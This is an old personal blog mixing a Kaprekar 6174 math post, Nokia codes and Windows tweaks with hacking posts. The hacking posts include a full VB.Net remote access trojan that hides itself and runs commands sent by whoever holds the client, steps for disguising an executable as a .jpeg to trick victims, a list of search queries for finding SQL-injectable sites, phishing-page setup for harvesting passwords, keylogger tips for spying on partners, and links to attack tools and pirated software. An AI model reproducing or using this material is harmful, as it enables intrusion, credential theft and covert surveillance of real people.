Wednesday, October 7, 2009

Mysterious number 6174

The number 6174 is a really mysterious number. At first glance, it might not seem so obvious. But as we are about to see, anyone who can subtract can uncover the mystery that makes 6174 so special.

Kaprekar's operation

In 1949 the mathematician D. R. Kaprekar from Devlali, India, devised a process now known as Kaprekar's operation. First choose a four digit number where the digits are not all the same (that is not 1111, 2222,...). Then rearrange the digits to get the largest and smallest numbers these digits can make. Finally, subtract the smallest number from the largest to get a new number, and carry on repeating the operation for each new number.

It is a simple operation, but Kaprekar discovered it led to a surprising result. Let's try it out, starting with the number 2005, the digits of last year. The maximum number we can make with these digits is 5200, and the minimum is 0025 or 25 (if one or more of the digits is zero, embed these in the left hand side of the minimum number). The subtractions are:


5200 - 0025 = 5175
7551 - 1557 = 5994
9954 - 4599 = 5355
5553 - 3555 = 1998
9981 - 1899 = 8082
8820 - 0288 = 8532
8532 - 2358 = 6174
7641 - 1467 = 6174

When we reach 6174 the operation repeats itself, returning 6174 every time. We call the number 6174 a kernel of this operation. So 6174 is a kernel for Kaprekar's operation, but is this as special as 6174 gets? Well not only is 6174 the only kernel for the operation, it also has one more surprise up it's sleeve. Let's try again starting with a different number, say 1789.

9871 - 1789 = 8082
8820 - 0288 = 8532
8532 - 2358 = 6174

We reached 6174 again!

When we started with 2005 the process reached 6174 in seven steps, and for 1789 in three steps. In fact, you reach 6174 for all four digit numbers that don't have all the digits the same. It's marvellous, isn't it? Kaprekar's operation is so simple but uncovers such an interesting result. And this will become even more intriguing when we think about the reason why all four digit numbers reach this mysterious number 6174.


Only 6174?

The digits of any four digit number can be arranged into a maximum number by putting the digits in descending order, and a minimum number by putting them in ascending order. So for four digits a,b,c,d where

9 ≥ a ≥ b ≥ c ≥ d ≥ 0

and a, b, c, d are not all the same digit, the maximum number is abcd and the minimum is dcba.

We can calculate the result of Kaprekar's operation using the standard method of subtraction applied to each column of this problem:

a b c d
- d c b a

A B C D

which gives the relations
D = 10 + d - a (as a > d)
C = 10 + c - 1 - b = 9 + c - b (as b > c - 1)
B = b - 1 - c (as b > c)
A = a - d

for those numbers where a>b>c>d.

A number will be repeated under Kaprekar's operation if the resulting number ABCD can be written using the initial four digits a,b,c and d. So we can find the kernels of Kaprekar's operation by considering all the possible combinations of {a, b, c, d} and checking if they satisfy the relations above. Each of the 4! = 24 combinations gives a system of four simultaneous equations with four unknowns, so we should be able to solve this system for a, b, c and d.

It turns out that only one of these combinations has integer solutions that satisfy 9 ≥ a ≥ b ≥ c ≥ d ≥ 0. That combination is ABCD = bdac, and the solution to the simultaneous equations is a=7, b=6, c=4 and d=1. That is ABCD = 6174. There are no valid solutions to the simultaneous equations resulting from some of the digits in {a,b,c,d} being equal. Therefore the number 6174 is the only number unchanged by Kaprekar's operation — our mysterious number is unique.

For three digit numbers the same phenomenon occurs. For example applying Kaprekar's operation to the three digit number 753 gives the following:

753 - 357 = 396
963 - 369 = 594
954 - 459 = 495
954 - 459 = 495

The number 495 is the unique kernel for the operation on three digit numbers, and all three digit numbers reach 495 using the operation. Why don't you check it yourself?

Thursday, July 30, 2009

Nokia Secret Codes...................

*#06# for checking the IMEI (International Mobile Equipment Identity).

*#7780# reset to factory settings.

*#67705646# This will clear the LCD display(operator logo).

*#0000# To view software version.

*#2820# Bluetooth device address.

*#746025625# Sim clock allowed status.

#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# - takes you to a secret menu where you may find some of the information below:

1. Displays Serial Number.

2. Displays the Month and Year of Manufacture

3. Displays (if there) the date where the phone was purchased (MMYY)

4. Displays the date of the last repair - if found (0000)

5. Shows life timer of phone (time passes since last start)

*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.

*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.

*#4720# - Half Rate Codec activation.

*#4720* - Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#

Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345

Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \

*#7328748263373738# resets security code.

Default security code is 12345

Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.

Saturday, June 27, 2009

SQL Injection Very Interseting

Copy & Then Paste into your Browser::::::::::

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:newsone.php?id=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:aboutbook.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:pages.php?id=
allinurl:clanek.php4?id=
allinurl:announce.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
allinurl:newsone.php?id=
allinurl:aboutbook.php?id=

check it's vulnerability by adding magic qoute (') at the end of the url

Hacking Ebooks Collection

Bruce Sterling The Hacker Crackdown
Building Internet Firewalls 2nd ed 2000
Crimeware- Understanding New Attacks and Defenses (Symantec Press).2008
Google Hacking for Penetration Testers
Hack Proofing Linux - A Guide To Open Source Security
Hacker Disassembling Uncovered
Hacker Highschool - Security Awareness For Teens
Hacker Linux Uncovered - A.List
Hacker.Web.Exploitation.Uncovered
hacker_crackdown
Hackers Beware
Hacker's Delight
Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition
Internetworking with TCP IP Vol.1 Principles, Protocols, and Architecture (4th Edition)
Internetworking with TCPIP Vol. III, Client-Server Programming and Applications--BSD Socket Version (2nd Edition) (Internetworking with TCPIP Vol. 3)

Links:::::::::


Dark Basic Game Creator

DarkBASIC allows you to create your own games, demos, slideshows, even business applications using the easy to understand BASIC programming language. Even if you've never coded before, just follow the in-depth tutorials and you'll be generating results in minutes! Harness the power of Direct X and make 3D objects come to life in just a few simple commands.



What Makes DarkBASIC So Special?

For the first time ever, the power of the PC and Microsoft's game engine Direct X can now be controlled by everyday PC users. It's no longer the sole domain of the expert 'C' programmer. Anyone with a PC can now make 3D objects move around the screen interacting with other game objects and taking live responses from the game player's inputs.

Features

All games created with DarkBASIC are license and royalty FREE!
All games can be distributed as a stand alone executable!

Other people are! So there is no reason why you can't too. If you've got the dedication and skill then you could produce a game worthy of retail with DarkBASIC. A number of DarkBASIC developers release their games into the Shareware market selling via their own web sites. Others have their games sold via independant distributors and publishers. If it's really good you can even find your game appearing on magazine CDs which is what happened to Star Wraith 3, featured in the PC Zone magazine for a number of months running.

Link:

http://rapidshare.com/files/221584717/Dark_Basic_v1.13.rar




Trojan Coding

In VB.Net


THIS CODE IS JUST A START TO WHAT CAN BE ACCOMPLISHED,IT IS JUST A BASE FOR WHAT YOU NEED TO KNOW,i also explain in the tut how to expand onto the code,its not easy but this is less flawless than any script kiddie program you'll find like bo2k or sub7.odds are if your a n00b wanting to hack your friend with sub 7 you wont find it(hakemate.com,sites in Spanish and you have to find out yourself how to register) and bo2k will be to advanced for you,so make your own!


first off a RAT is a computer program that allows you to remotely access the computer running a server file,the RAT consists of 2 programs a client and a server.you run the client which connects to a port on a remote ip running the server

RAT stands for (Remote Access Trojan/Tool)

the server is set to listen on a specific port,high numbers such as 16995 and other 5 digit numbers are best so the port is not easily recognized by certain computer applications its also best to stay away from 12345 and 54321 etc...

but now that you under stand the basics(hopefully)
this is what you need to do to create and program your own

(i) download vb express or buy/hack visual studio pro

now create a new windows application
name it "server"
double click the forum to edit the code
at the top of the code file put


Imports System.Net
Imports System.Net.Sockets
Imports System.IO
Imports Microsoft.Win32


all this does is allow easy access to certain commands,for example system.io allows access to file commands

file.open(path)
compared to
System.IO.File.Open(Path)


so now we need to create a listing socket which opens a port on the host computer with this.
place this in the form1_class code before form1_load


Dim port As Integer = 6961
Dim tcpc As New TcpListener(port)

now a new tcp client

Dim port As Integer = 6961
Dim sock As New TcpClient()
Dim tcpc As New TcpListener(port)


now we need a function that allows us to enable listing on the port when it is called,place this below the code you just wrote

Private Sub listen()
Try
tcpc.Start()
sock = tcpc.AcceptTcpClient()
Catch ex As Exception
End Try

End Sub


what this does is creates a function to call which try's to allow the listener to start listening and when the client try's to connect it accepts it and if it fails it just retrys again

now the complicated part.now we need to create a network stream that allows us to send and receive data from the client and place it in a function



Private Sub check()
If sock.Connected = True Then
sock.SendTimeout = 5000
Try
Dim nstream As NetworkStream = sock.GetStream
Dim bit(sock.ReceiveBufferSize) As Byte
nstream.Read(bit, 0, CInt(sock.ReceiveBufferSize))
Dim str As String = System.Text.Encoding.ASCII.GetString(bit)
Dim id() As String = Split(str, "*", -1, CompareMethod.Text)



If id(0) = 0 Then
Dim stri As String = id(1)
Process.Start(stri)
End If
Catch ex As Exception
check()
End Try
End If
End Sub


this script is actually quite simple,all id does is say id the listener is connected to a socket it redirects the connection to a socket in the server
and if the server socket is connected it trys to receive the sockets data stream.
it then defines "bit" as a byte readable by the server data stream and gets its total size,it then tells the socket to read the incoming data,once it is all received it creates a string used to receive string data sent by the client.
it then defines a string array that splits string data received and the id sent so the server knows what command to execute determined by the if statement.

this next if statement says if the first string in the array "id" is equal to 0 then a string is defined as the second string in the array "id" and then a process is started from the path depicted from id(1) the second string in that array.

so now all we need to do is tell the program to run these functions in the form1_load command that is already present,in that sub form put this code


While sock.Connected = False
Try
listen()
Catch ex As Exception
End Try
End While


While True
check()
End While
Me.Hide()


this allows the server to start listening and once it has found a connection it runs the check() function to preform the actions that allows the socket to read the data then hides the form for added security.
now your server is finished and we must now create the client which is a bit more complicated believe it or not


(ii) Again create a new windows application in vb.net and on the form place 3 text boxes and 2 buttons and 3 labels

give button 1 the text "connect"

and give button 2 the text "send"

now before anything special happens we need our basic code,double click form 1 to edit the code,now like in the server above everything in the code,even form1 class put the code

Imports System.Net
Imports System.Net.Sockets


now in the class code put

Dim sock As New TcpClient()
Dim ip As IPAddress = IPAddress.Parse("127.0.0.1")
Dim port As Integer = 6961


like before this defines a tcp client to connect to the server
it creates a non-text variable for the ip adress for the socket to connect to,for some reason Microsoft is just gay and doesn't allow you to use a string with the socket.connect() command do all this does is turn a string into an ip address then it defines a variable called port with the value 6961 which can be changed



now the fun stuff (sarcasm)

below all your variable definitions place the code


Private Sub connect()
ip = IPAddress.Parse(TextBox1.Text)
port = TextBox2.Text
Try
sock.Connect(ip, port)

Catch ex As Exception
MsgBox("Can not connect to designated ip at this time")
End Try
End Sub


this creates a function named connect() when it is called it sets the value of "ip" to what you have written in text box 1 and then port is set to what you have in text box 2

now with these 2 values the socket naked sock trys to connect to the ip and port that where defined and if the connection fails an error message is shown saying "Can not connect to designated ip at this time" feel free to change that to w/e you may like now we need a function to be called when we want to send data to the connected socket


Private Sub dat(ByVal dat As String)
Dim nstream As NetworkStream = sock.GetStream()
Dim bit As [Byte]() = System.Text.Encoding.ASCII.GetBytes(dat)
nstream.Write(bit, 0, bit.Length)
End Sub


so now when you call dat() you need a string in the () to be sent
but well worry about that later,it defines nstream as "sock's" data stream then defines bit as a byte that encrypts the text into bytes that can be sent over to the server,then the data stream sends the string now go back to the design of form 1 where you inserted the text boxes and stuff then double click button1 and in between the brackets of the button1_click put this code


connect()

this calls the function connect() which allows the socket to try and connect to the designated port/ip

now do the same thing to button 2,and for the button2_click put


dat("0*" + TextBox3.Text)

this calls the dat() function and attaches the string "0*" which is the id of the string being sent to the server plus the text in text box 3 which should be a path to an application such as "c:\windows\virus.exe" or something or it can also be a web page you want opened like "http://www.freeporntoinfectmycomputerwithviruses.com" without the quotes of coarse
so the string sent would look like this

The * is needed to separate the string once it is decoded in the server,so if you want to send more than the id and 1 string you need to separate them with *
like this


dat("0*" + TextBox3.Text + "*" + TextBox4.Text)

this would do nothing as there is no text box 4 because this is only an example,and since there is no text box 4 an error would be generated,but that is how you would do it

now that's basically it,this is basically it for the client.this script is very versatile as dat() can be called on any button press/keypress ect... so if you want more features lets say one create a message on the computer with the server you would use this in a separate button press pointing to another text box like this


dat("1*" + TextBox4.Text)

which just send the text with a new id to the server,but you must modify the server to recognize that id as well

so to do that the code


Private Sub check()
If sock.Connected = True Then
sock.SendTimeout = 5000
Try
Dim nstream As NetworkStream = sock.GetStream
Dim bit(sock.ReceiveBufferSize) As Byte
nstream.Read(bit, 0, CInt(sock.ReceiveBufferSize))
Dim str As String = System.Text.Encoding.ASCII.GetString(bit)
Dim id() As String = Split(str, "*", -1, CompareMethod.Text)


If id(0) = 1 Then
Dim stri As String = id(1)
Process.Start(stri)
End If

Catch ex As Exception
check()
End Try
End If
End Sub


should now be

Private Sub check()
If sock.Connected = True Then
sock.SendTimeout = 5000
Try
Dim nstream As NetworkStream = sock.GetStream
Dim bit(sock.ReceiveBufferSize) As Byte
nstream.Read(bit, 0, CInt(sock.ReceiveBufferSize))
Dim str As String = System.Text.Encoding.ASCII.GetString(bit)
Dim id() As String = Split(str, "*", -1, CompareMethod.Text)


If id(0) = 0 Then
Dim stri As String = id(1)
Process.Start(stri)
End If

If id(0) = 1 Then
Dim stri As String = id(1)
MsgBox(id(1))
End If

Catch ex As Exception
check()
End Try
End If
End Sub


this has been added

If id(0) = 1 Then
Dim stri As String = id(1)
MsgBox(id(1))
End If



so if id(0) is 1 which is the command id it creates a message box with the text sent after the id so it would be whatever you made text box 3 say in your client

So now you should save and build both the server and the client because your ready to go,this is all my code hand written and thought of by me so there shouldn't be another method like this.

NOW to use this application,send the server to somebody and once they have opned it,it should start listening on the port defined in the server,which is 69691 but can be changed,so once you have somebody running the server you need there ip,look on the web for tutorials on how to find an ip through email,aim,msn,or even message boards

so now once you have the victim's uhh i mean host's ip open the client and in text box 1 put the ip address and in text box 2 put the port,now click connect,an error should come up if you cannot connect,now once connected put a url or path in text box 3 and hit send,this should open a webpage on the hosts computer.


------SERVER------

Imports System.Net
Imports System.Net.Sockets
Imports System.IO
Imports Microsoft.Win32

Public Class Form1
Dim port As Integer = 6961
Dim sock As New TcpClient()
Dim tcpc As New TcpListener(port)
Dim place As String

Private Sub listen()
Try
tcpc.Start()
sock = tcpc.AcceptTcpClient()
Catch ex As Exception
End Try

End Sub

Private Sub check()
If sock.Connected = True Then
sock.SendTimeout = 5000
Try
Dim nstream As NetworkStream = sock.GetStream
Dim bit(sock.ReceiveBufferSize) As Byte
nstream.Read(bit, 0, CInt(sock.ReceiveBufferSize))
Dim str As String = System.Text.Encoding.ASCII.GetString(bit)
Dim id() As String = Split(str, "*", -1, CompareMethod.Text)


If id(0) = 0 Then
Dim stri As String = id(1)
Process.Start(stri)
End If
Catch ex As Exception
check()
End Try
End If
End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load


While sock.Connected = False
Try
listen()
Catch ex As Exception
End Try
End While

While True
check()
End While
Me.Hide()
End Sub
End Class


-
-----Client------

Imports System.Net
Imports System.Net.Sockets

Public Class Form1
Dim sock As New TcpClient()
Dim ip As IPAddress = IPAddress.Parse("127.0.0.1")
Dim port As Integer = 6961

Private Sub connect()
ip = IPAddress.Parse(TextBox1.Text)
port = TextBox2.Text
Try
sock.Connect(ip, port)

Catch ex As Exception
MsgBox("Can not connect to designated ip at this time")
End Try
End Sub

Private Sub dat(ByVal dat As String)
Dim nstream As NetworkStream = sock.GetStream()
Dim bit As [Byte]() = System.Text.Encoding.ASCII.GetBytes(dat)
nstream.Write(bit, 0, bit.Length)
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
connect()
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click

dat("0*" + TextBox3.Text)
End Sub




Sunday, February 22, 2009

Just Try This

Convert an .exe to Open and Run with a .jpeg

1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.

2. Paste a copy of your server on the new created folder. let's say it's called server.exe (that's why you need the extension of files showing, cause you need to see it to change it)

3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg

4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5. Now create a shortcut of this picture.jpeg in the same folder.

6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.

7. Go to properties (on file me.jpeg) and now you need to do some changes there.

8. First of all delete all the text on field START IN and leave it empty.

9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg

10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?

11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.

12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.

13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.

14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.


How To Watch A Movie On Your Desktop

1: Play a movie in almost any movie player.

2: Take a screenshot of it anywhere in the movie.

3:Then paste it into paint.

4: Save it as a .bmp file.

5: Now set it as your desktop background and watch the movie

To Increase the Internet Speed

Open Notepad and paste the below code in it.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters]"SackOpts"=dword:00000001"TcpWindowSize"=dword :000 5ae4c"Tcp1323Opts"=dword:00000003"DefaultTTL"=dwor d:00000040"EnablePMTUBHDetect"=dword:00000000"Enab lePMTUDiscovery"=dword:00000001"GlobalMaxTcpWindow Size"=dword:0005ae4c
Now save this file as speed.reg. Execute it and observe the change!


Changing Your Dynamic IP Address

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit okay
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until it fill the area up). 12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "ok" button here
14. Hit the "ok" button again
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
18. Hit "ok"
19. Hit "ok" again
20. You now have a new IP address
Using The Mouse Wheel To Control The Font Size:
Try using the Control key with the mouse wheel. This works a zoom function. You do this for Office 2000 applications as well, but in IE it just works on the text, so the page stays somewhat the same.


Customize Internet Explorer's Title Bar

Open Registry by going to Start then Run and Enter regedit. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.

Speed Up Browsing By DNS Cache

Each time you browse a web site on the internet, the actual site name you type is resolved to an IP address. This translation is effected through what is called the DNS (Domain Name System). This DNS information is stored in your computer so that each time you type a web address , a record of its IP address is stored so that it can be recalled later without having to retrieve it again. One way to speed up your browsing experience is to increase this DNS cache in windows XP. You will need to modify registry for this. Start notepad & enter the following text into it: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic esDnscache\Parameters] "CacheHashTableBucketSize"=dword:00000001 "CacheHashTableSize"=dword:00000180"MaxCacheEn tryT tILimit"=dword:0000fa00 "MaxSOACacheEntryTtILimit"=dword:0000012d Save this file, naming it dnscache.reg . Double click on the file in windows explorer & merge it into your registry.

Wednesday, February 18, 2009

Hacking articles

A book who teaches you how to make trojans in Delphi:

http://rapidshare.com/files/173953686/PaperX_-_how_to_code_a_TROJAN.pdf

How to find any song (mp3) using google !

Ok lets see how we can use this to find any song we want..
First lets see in normal terms how google responds to us when we search for this old classic song Hotel California performed by Eagles

As you can see we end up with tons of results as every one of them either asking you to purchase the tracks..so on.. all of us done this before and we clearly know there is no place to get the files downloaded for free

Now lets hack…

Here is the code I’m going to use it in the Google search field

?intitle:index.of? mp3 Song name

SQL Auto-Injector

http://rapidshare.com/files/199194759/Sql_Auto-Injection_2.6.7.rar

Some phishing Page with

---What is a phisher---
Basically a phisher is a fake login page, that is made to look exactly like the real login page of the real website so as to fool somebody into entering their information and sending it to you.

---How can I get somebody to login to my phisher---
That's for you to find out, use your mind. Probably the simplest way is Social Engineering and some phishing skill.

---How to use---
Find a web host that supports php.
Upload all of the files to your web hosting.
Goto the link (yoursite.freehostname.com or whatever) and it should show the login if you uploaded it in the root directory.
To get the passwords they enter goto yoursite.freehostname.com/passwords.txt, or whatever the name of your text file is.

---Changing the log.txt or password.txt to something else---
First rename your text file to what you want it, so nobody can guess it.
Then open the next.php (or may be named out.php)and edit the text that says passes.txt to whatever you named your text file.

---How to hide links in forums---
If your trying to post it where html is allowed its:
http://yourreallink.com

If you are trying to post it on forms its: http://yourreallink.com

Fake Email (Public Edition)

http://rapidshare.com/files/198433810/Fake_Email.rar

Don't ask for e-mail hacks -- Read Why

I'm merely disappointed by the number of technically illiterate people around the world. The most popular question in any hacking related site is "How to hack e-mail" its not tolerated in any security/hacking related forum and if asked you can expect to get a rant from people. the reason is simple because there are NO ways of hacking a e-mail address by easy means and the people who know this fact often get very annoyed when most people don't understand WHY its NOT POSSIBLE !

The hacking of a e-mail is possible when a person who owns the account gets hacked. the other way is to hack them directly from the e-mail servers which is most unlikely because these sites use sophisticated Intrusion Detection and highly skilled consultants who are up to date with exploits and patch's. unless you are a real professional hacker its highly unlikely you will ever break into a e-mail server.

People MUST understand that there are NO PROGRAMS/SOFTWARE'S that can hack a e-mail password when you enter an e-mail address. to understand this better let me explain you how e-mail works

Lets say you have a gmail account

When you enter your username and password and hit login what happens is your outgoing e-mail server encrypts the login information and sends over the network to its destination which is a gmail server which can ONLY decrypt the encrypted credentials then these were checked against its database and if they match it will re direct you to your mail inbox. to authenticate you with the gmail server, it will send you a cookie ( a text file ) with a session ID to your browser confirming that you are authenticated so the gmail server.

So there was a time when e-mail servers gave the option to NOT to use SSL cause it slows down the e-mail. because of the time it takes to encrypt. it was a "happy time" for the hackers who simply used a wifi hotspot to sniff session ID and break into emails !!! why ? because If anyone sniffs your session ID he can use it to login into you mail WITHOUT the password because the session ID is the proof of authentication as I mentioned earlier ^ but with almost all the e-mail servers NOW use a SSL encryption and the Session ID is also encrypted so by sniffing its NOT possible to decrypt the ID !

So there goes Packet Sniffing

You may ask so what ? why the encryption cannot be cracked ?

Because The encryption uses Hypertext Transfer Protocol over Secure Socket Layer and public/Private key encryptions technique which is almost impossible to crack. Do some Research on these terms and you will know why its not possible to crack/

If you're curious and patient enough read this else Skip

Internet Encryption

So now the next possible way is to somehow hack into the gmail servers and pull the password hash's and then crack them. well, sadly not many people have succeeded doing it because its highly impossible and way too risky

Now after reading all this you might have a slight idea why I ask people who claim "they can hack any e-mail" to prove it !! so if you can make a program that can somehow bypass all the security and bring the password from the gmail server then you deserve a noble prize !!!



NOW ASK ME HOW TO HACK A E-MAIL ?

Ok you clearly know its almost impossible but the good news is that its possible to hack a individuals computer or a web server. most people lack of common sense and so many people have NO technical knowledge whatsoever. so by hacking them its possible to steal their passwords.

Because we can't hack the password from the servers but we can hack it from the people who use it..

There are so many ways.. here are some of the methods,

1. Fake Login page - Fake page also known as phishing. This process involves creating a fake login page of a certain e-mail and tweaking the password authentication process so when the user inserts login details it will be sent to the hacker. This is the easiest way to hack when the victim has no technical knowledge.

2. Social Engineering - Humans have certain weaknesses and this process involves exploiting someone's weakness to retrieve a credential such as a password. for an e.g: There are many incidents in the past like once when a hacker phoned a employee of a company (victim) and identified himself as the Technical Engineer of that company and instructed the employee (victim) to follow a set of FAKE system error checking and eventually received his login password from him by simply convincing him to reveal them. its just simple as that/ it does takes lot of confidence and skill.

3. Keylogger - Its an application which runs hidden from a user in the background and logs/records all the keystrokes of a user. when a user types something it will be recorded and saved. when the system goes online the recorded details will be sent to the hacker. which can contain a e-mail login detail. the keyloggers are outdated and most of them are detected by anti-virus programs. but when used in a LAN network or when the hacker has physical access to a system it proves to be effective. so if your girlfriend/boyfriend is cheating on you this is the way to go.. but I still think smart people don't keep "cheating related e-mails in their inbox" he he

The downfall of keyloggers are that not many keyloggers can be deployed remotely and they are often picked by anti-virus programs (which can be avoided by using code obfuscation or packing/crypting, changing Entry point..but its more complex)

Another downfall of keylogger is that most of them don't use any encryption and the data is sent as it is, with a skilled reverse engineer its possible to track down the hacker by breaking the file and analysing the code.

4. Trojans - Programs which are often known as backdoors. these programs are similar to keyloggers but they can execute certain commands sent by the hacker. most Trojans have a built in password stealer which is an application that can steal stored browser passwords. also in addition they have far more sophisticated functions such as webcam capture (YES the hacker can see you when you pick your nose) ability to browse/download/edit your files and folders, audio recording, etc.. different Trojans have different functions. All hacker has to do is create a server and send it to the victim and once the victim opens the file it will drop into the victims system and connect to hackers client. now he can issue commands to his server which is in the victims computer and manipulate it whatever the way he likes.

Trojans are very easy to use and most of them use encryption and security evasion techniques and there are TONS of tutorials all over internet if anyone interested in using them.

I hope I have covered enough information. so next time when you see someone asking "How to hack email" Please point it to this thread. so he/she don't waste his/her time and money.

My advise is if you have a personal issue such as cheating/breaking up I encourage you to sort them by other means. or maybe Go see a doctor. if she dumped you... MOVE ON !

DON'T EVER PAY ANYONE TO HACK ANY EMAIL because ................ I hope you read the whole thing ^

I hope this sheds some light and answers the most asked question of all time. Feel free to add your suggestions/feedback and if you share this article please keep the credits intact. any questions feel free to ask and if you want feel free to write constructive criticism.

Telephone Line Hacking and get free calls


This video will show U how to talk or use in other telephone lines...
so that U can use this techniques to talk to anyone without paying bills......

NOTE:::: kindly use this video to know about the techniques....don't imitate this

http://rapidshare.com/files/168235301/CW_telephonehack.rar

pass : EagleLord@CW

Paypal Database 1.5 Full version Free

Hi, guys i have discovered on youtube the full version cracked of paypal database 1.5 of inferno hackware.
But the rar file is protected by password, is 6 length the password, i have try with rar cracker with bruterforce but the estimate time is 1 month!
If you wanted you can crack the rar and after you can send the password in a new post here, please.

Link: http://rapidshare.com/files/187145222/Paypal_DB_1.5__updated_.rar




Software torrents

Orcad Pro v10.0.8252

http://uploading.com/files/TUIY0VZ9/Orcad_v10_5_SP1_Schematics_(By_Knight_Rider)-(Demonoid.com)_6949383.9.torrent.html

